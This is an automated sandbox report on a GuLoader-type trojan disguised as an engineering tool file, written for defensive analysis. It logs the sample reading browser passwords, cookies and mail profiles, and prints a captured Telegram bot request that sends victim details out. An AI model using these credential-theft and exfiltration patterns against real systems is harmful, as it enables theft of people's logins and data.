            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_00405D1F GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D1F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara matchFile source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 800, type: MEMORYSTR
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Remote Access Functionality

            Source: Yara matchFile source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 800, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 31 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 System Network Configuration Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 3 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Access Token Manipulation | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 115 System Information Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

            Source | Detection | Scanner | Label | Link
            SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe | 55% | ReversingLabs | Win32.Trojan.GuLoader |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll | 0% | ReversingLabs | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            drive.google.com | 142.250.80.46 | true | false | | unknown
            drive.usercontent.google.com | 142.250.65.225 | true | false | | unknown
            reallyfreegeoip.org | 172.67.177.134 | true | true | | unknown
            api.telegram.org | 149.154.167.220 | true | true | | unknown
            checkip.dyndns.com | 132.226.247.73 | true | false | | unknown
            checkip.dyndns.org | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2007/10/2024%20/%2004:56:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
            http://checkip.dyndns.org/ | false | | unknown
            https://reallyfreegeoip.org/xml/191.96.150.187 | false | | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                    unknown
                                                                                                                                                    https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://api.telegram.orgSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://www.google.com/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://secure.eicar.org/eicar.com.txtSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.80.46 | drive.google.com | United States | 15169 | GOOGLEUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
142.250.65.225 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | true
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1527845
Start date and time: 2024-10-07 10:52:21 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/9@5/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 129
• Number of non-executed functions: 187
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                              No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                      api.telegram.orgYeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      reallyfreegeoip.org8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                      #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      https://pub-c32e86b2348440f0b4bcf91d16f22053.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      MAVI VATAN - VSL's DETAILS.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19t5985gRtZo.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      0urFbKxdvL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      setup_installer.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      file.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      file.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      zR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      buildz.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
Match: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll
Associated Sample Name / URL, Detection, Threat Name:
• lt0Bl5kc0e.exe, malicious, GuLoader
• lt0Bl5kc0e.exe, malicious, GuLoader
• Orden de Compra.exe, malicious, GuLoader
• Orden de Compra.exe, malicious, GuLoader
• rSWIFT.exe, malicious, GuLoader, Snake Keylogger
• rSWIFT.exe, malicious, GuLoader
• DHL EXPORT.exe, malicious, GuLoader, Snake Keylogger
• DHL EXPORT.exe, malicious, GuLoader
• Revised PI_2024.exe, malicious, GuLoader, Snake Keylogger
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50
                                                                                                                                                                                                                        Entropy (8bit):4.558562939644915
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:RlvjDkAQLQIfLBJXmgxv:R1ZQkIP2I
                                                                                                                                                                                                                        MD5:A6216EF9FBE57B11DEEB1B1FD840C392
                                                                                                                                                                                                                        SHA1:E554348623EF9ADDDE2FB3F2742D5CC1EF240AB1
                                                                                                                                                                                                                        SHA-256:EDF6C9DA71DAF3B3DA2E89A1BC6B9F4B812F18FC133CF4706A3AE983E4040946
                                                                                                                                                                                                                        SHA-512:AF5FDD8419B8384361BBEA7600B4DA7860771DD974D3B2D747C6E1C4F7E4DF49FE4BE5FA2320E9041343C8D2AB5912BE1CF279B61ED2A96954C1C2ED05AA0122
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                                        Preview:[Common]..Windows=user32::EnumWindows(i r1 ,i 0)..
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):11264
                                                                                                                                                                                                                        Entropy (8bit):5.770335399747744
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:BPtkumJX7zB22kGwfy0mtVgkCPOse1un:u702k5qpdseQn
                                                                                                                                                                                                                        MD5:4D3B19A81BD51F8CE44B93643A4E3A99
                                                                                                                                                                                                                        SHA1:35F8B00E85577B014080DF98BD2C378351D9B3E9
                                                                                                                                                                                                                        SHA-256:FDA0018AB182AC6025D2FC9A2EFCCE3745D1DA21CE5141859F8286CF319A52CE
                                                                                                                                                                                                                        SHA-512:B2BA9C961C0E1617F802990587A9000979AB5CC493AE2F8CA852EB43EEAF24916B0B29057DBFF7D41A1797DFB2DCE3DB41990E8639B8F205771DBEC3FD80F622
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: lt0Bl5kc0e.exe, Detection: malicious
• Filename: lt0Bl5kc0e.exe, Detection: malicious
• Filename: Orden de Compra.exe, Detection: malicious
• Filename: Orden de Compra.exe, Detection: malicious
• Filename: rSWIFT.exe, Detection: malicious
• Filename: rSWIFT.exe, Detection: malicious
• Filename: DHL EXPORT.exe, Detection: malicious
• Filename: DHL EXPORT.exe, Detection: malicious
• Filename: Revised PI_2024.exe, Detection: malicious
                                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):86048
                                                                                                                                                                                                                        Entropy (8bit):1.2588853328265353
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:J0z6wdM0UhwfIaiNOwn6bSGd014Z8uxG:JcsGdu4Zy
                                                                                                                                                                                                                        MD5:DDD2489DDFC524E9EE509A9F23FB902B
                                                                                                                                                                                                                        SHA1:B9B6684CA4D8A8B995C1603E7C19726784EEE000
                                                                                                                                                                                                                        SHA-256:4C232E2ECF884CFB880063A1965E3BDB9A6C79F2FA92CD88F6C7E6779E6DA73B
                                                                                                                                                                                                                        SHA-512:BAB10F980BF0DF1E2801A7198836604BDDA1565D798CBA5917FE74FF9A7575738AA9A28484496F9057CCD6916C1A76851264BF6ABD0112323714D5457C0D41E4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):368164
                                                                                                                                                                                                                        Entropy (8bit):7.623039146577399
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:WJvjV3qwOFGkUWbNGKzNvROY80A+87aBjci6h6WYISRWP0orkadn:WxArFGkUMAJYx/8aBjcZMWYIOWcwkadn
                                                                                                                                                                                                                        MD5:36BB7469E45CC4B996211E55CEF3FA3C
                                                                                                                                                                                                                        SHA1:1B99C8904ED078AB68BD7FD102FA9858B4934178
                                                                                                                                                                                                                        SHA-256:2FFE647E7B470C383C0A750B2D4E6D793E0FD17ED98CC21713468DC0B8C0C849
                                                                                                                                                                                                                        SHA-512:BD7EBFCEE38C06F509AD901C8A631916988BE9DD3AC45A305E815B3F7C72BA3F80310BF0571175769E9D65D66F11BC29649C6EB7DC0B6CB09B540F57DBD20799
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):162181
                                                                                                                                                                                                                        Entropy (8bit):1.2617911951735907
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:9bJxjjqJeE5S9s6szcH7FgY8bY4wt29WrBWstS2uVFyIRT63fBmdzzjIWEzHX+Ln:bx6v54sbUFOY928thNPCQWE9Q
                                                                                                                                                                                                                        MD5:43C93BE687DF1FEADFB2875C59B2B0C6
                                                                                                                                                                                                                        SHA1:B73BCF95842F90A848E9ED8E93B16DD2C65342CA
                                                                                                                                                                                                                        SHA-256:182B621DBE6D3C8DA69DFEAB3D669EF39583CDD08924B8FB40D4D8C66CAF0ED7
                                                                                                                                                                                                                        SHA-512:491F384F93AECB7553D33FCE4EE576D9E44B6981202AF648C3369449F76568A87DE1B466904FE370C8721AA509EBF42236C8EA126AD3F88C24B3372A0F041A36
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):402098
                                                                                                                                                                                                                        Entropy (8bit):1.2523065426009072
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:ADeNhGs9RZUw+t2FRLS3kHxI5Sgm5tKOqSDKljjuss7LkXRnxTOx1wMZSYS4t7es:9tPgCZeaweSFE6+0ORTiYpkDj5n25
                                                                                                                                                                                                                        MD5:26D18C98FC2BBDDCC2EABECE2B7B7F7A
                                                                                                                                                                                                                        SHA1:B4B1E5A647D978FE16FCDCA2CEF87D526692E5CA
                                                                                                                                                                                                                        SHA-256:384AB607C9DE2127413622AB57F6B7415CEE138009B9EC333CF7A3564770F33F
                                                                                                                                                                                                                        SHA-512:E23E0CEEDBFF28B216C66BBCABE3422D63DAA48576E9C74C230FB728C3639B3A43324DA765D5B9A65428BDB4D420BDC9FEAB97CE2F63A6849F8B54BEEAE2AFCD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):262145
                                                                                                                                                                                                                        Entropy (8bit):1.2496109964873419
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:9XbhQfa5JLTv4IpFOrnxsCbpcSmgnKRYbfROeHfGA3hqDwfO7vpbWckbUvdb+FKd:9rzGxUsfSpdQmXLfWi80/APsuZnHaec
                                                                                                                                                                                                                        MD5:D307E67597944CE2EF28F2327B44806A
                                                                                                                                                                                                                        SHA1:54088A21AC7AD116A026AFDDAD56EBA053AECEA8
                                                                                                                                                                                                                        SHA-256:1D24BA37A824DFD8634735D26A476D5D373D1957C87649CB6F13AE4A80E4BD6C
                                                                                                                                                                                                                        SHA-512:8E6A019FBD15F36B38249108413CF669E1F5FFB3B49677877356C2EB45C4F2E04CB1509ADD33483AE1D84D14E83AA108AD0672F208DC683C2B1DFA2C94841B18
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:DIY-Thermocam raw data (Lepton 2.x), scale 56-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 140075391325219348865385704194048.000000
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):392910
                                                                                                                                                                                                                        Entropy (8bit):1.243713183340455
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:Q4/fVNwA7vKgOXpUUQ4Bm6OwhTAQc3uRQJK:QAffweOOUc6/zHRQJK
                                                                                                                                                                                                                        MD5:4152ABE0E93A89EDDEA6AD43943D345D
                                                                                                                                                                                                                        SHA1:97D61B7F616EFF3894F98CD1167EDE0C4484E969
                                                                                                                                                                                                                        SHA-256:FE2499BAC94D1E864A127D1C923EAA55CDD7DB247A65765D4024EE65EE2F191B
                                                                                                                                                                                                                        SHA-512:01B4F62EDBFEF0A1AD17DF2840F33FDF3F6858FD06BC2C50EBDB41AC4A9FAD3D9933048BEFEE6B942950C08D17D809369591F120F0D8CDEDDDCB4C9487C3F5D1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):32
                                                                                                                                                                                                                        Entropy (8bit):4.077819531114783
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:4l4CQ2AXL0ZTXP:L7XAp
                                                                                                                                                                                                                        MD5:1D4E67719C03DEEB154AE09EB4797083
                                                                                                                                                                                                                        SHA1:2EAE1079FF7B056433C03C58924E7BE9D5495F17
                                                                                                                                                                                                                        SHA-256:3CB1718228362F66F2B4EA524B73BBF80CBB98813393F40E32005E47E698FB76
                                                                                                                                                                                                                        SHA-512:5D7A984CEF4142B488E2E646F0CF5CA9602D5C97E184679D598C925F551DAC1A1CCB37D42A64FCD0B8AE77A3F7EA7874C538B606E5532FB4450F196D67917FCF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:[sharkskin]..tutorerne=slagvrk..
